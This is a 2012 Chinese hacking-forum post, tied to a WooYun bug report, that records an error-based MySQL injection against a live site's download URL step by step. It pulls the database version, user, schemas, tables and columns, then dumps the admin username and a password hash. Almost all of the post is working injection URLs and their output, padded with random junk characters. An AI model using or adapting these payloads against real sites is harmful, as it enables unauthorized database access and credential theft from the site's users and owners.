找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 1843|回复: 0
打印 上一主题 下一主题

php+mysql高级爆错注入经测算有效

[复制链接]
跳转到指定楼层
楼主
发表于 2012-9-13 17:52:09 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
http://www.wooyun.org/bugs/wooyun-2010-01666$ ~3 ]6 T+ L  i9 Z) v6 z9 I; k

7 L5 h  d/ i! U之前想找个测试 没想到这有 可以测试下做个记录而已 & x  \9 b' R; I$ J

; c9 _9 n9 ]# a! x( fhttp://xxoo/download/downpage/netarea/id/1600003'+and+(select+1+from(select+count(*),concat(0x7c,(select+(Select+version())+from+information_schema.tables+limit+0,1),0x7c,floor(rand(0)*2))x+from+information_schema.tables+group+by+x+limit+0,1)a)%23/wapc/5000_0005_0030 s1 I: H2 S  J/ r
# |& F) [# C/ \% ]+ L( e
/data0/htdocs/leqi_new/app/myapp.php
$ \8 T8 I# E) Q/ `9 h4 s
* G+ T/ A! {7 ^) u 或者
$ T* ^  H6 `/ y8 \$ `' g$ C- G) M
. J8 a9 t6 B8 T  i6 F/**********version()**********/ 5.1.49-log/ O2 B' g- p. R4 c! t$ F" Q9 F8 r* R
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+version()),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_0033 c1 G2 J2 A* B1 F  |7 u# k

/ a+ K; s8 ?/ v' z/**********user()**********/  ) \8 P5 n4 r6 L$ X& A8 d
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+user()),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003
( U! T& ?0 j. K6 X
4 o! J; R% u9 p/ H0 H: l% A! X# |# z8 l/**********database()**********/  leqi" \2 X( Z; n) @- U& p# H, u' F
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+database()),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003/ @# u  W# @) U8 h; ^- V- y

- K# {/ p+ G6 r( K; ]7 b" m/**********limit依次递归爆库**********/- O9 E* w9 M+ r9 y1 }" O
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+schema_name+from+information_schema.schemata+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003  C! T, Y$ p& B; f! I
information_schema5 z! z8 s( Z3 E
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+schema_name+from+information_schema.schemata+limit+1,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003& \# H1 R+ b6 _- _2 e; {' G1 ^
leqi
5 O9 V6 z1 \, _1 v% Shttp:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+schema_name+from+information_schema.schemata+limit+2,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_0035 \3 t6 i6 T$ P
test
7 e5 K1 U3 W5 y, g9 E1 Z  W/ n+ Y# y3 j
/**********limit依次递归爆表名**********/
- c  Q0 F3 |3 }9 Yhttp:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+table_name+from+information_schema.tables+where+table_schema=0x6C657169+limit+200,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003! |+ _4 Q$ h/ U, {+ L" k" Y( G, _
users
. n" Y  T, R1 o
7 l* \: r9 h# }# q, t1 O/**********limit依次递归爆字段名**********/
" Z# R7 g0 ^. z$ h8 I4 B% zhttp:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+column_name+from+information_schema.columns+where+table_schema=0x6C657169+and+table_name=0x7573657273+limit+3,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003$ S+ h" {' S2 ~/ A  d4 L
user_id,username,nickname,passwd,group_id
$ Z' p; H8 u4 ]' Uhttp:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+group_id+from+users+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%230 S* n. E: U1 C; P
/wapc/5000_0005_003
0 l' a  [* R( @: E11 210 }9 B9 Z0 T! \7 r
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+user_id+from+users+limit+1,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23, P; v- C+ U. @& M! Z
/wapc/5000_0005_003
: e' \( u% ~4 p# @- W( [+ O11 341 351 361* I% ^) X9 Q" s5 |' m9 i0 w
/**********爆数据**********/
( u) v/ h$ Y) t1 F" S/ X/ bhttp:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+username+from+users+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/ M2 _) ?4 t2 F' g. a% V; l
admin
1 Y7 \+ ]5 q$ Q9 y$ nhttp:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+passwd+from+users+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23
7 D4 Z( ?& a# N- K8 O% ~6a8b4574ca231eb8bd52764d4978ffcd
- Y( e3 M" M9 ^. ]# f- ?
$ D) G/ u! m% Q( j/ A/ L
* w4 ^, B2 E6 e
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表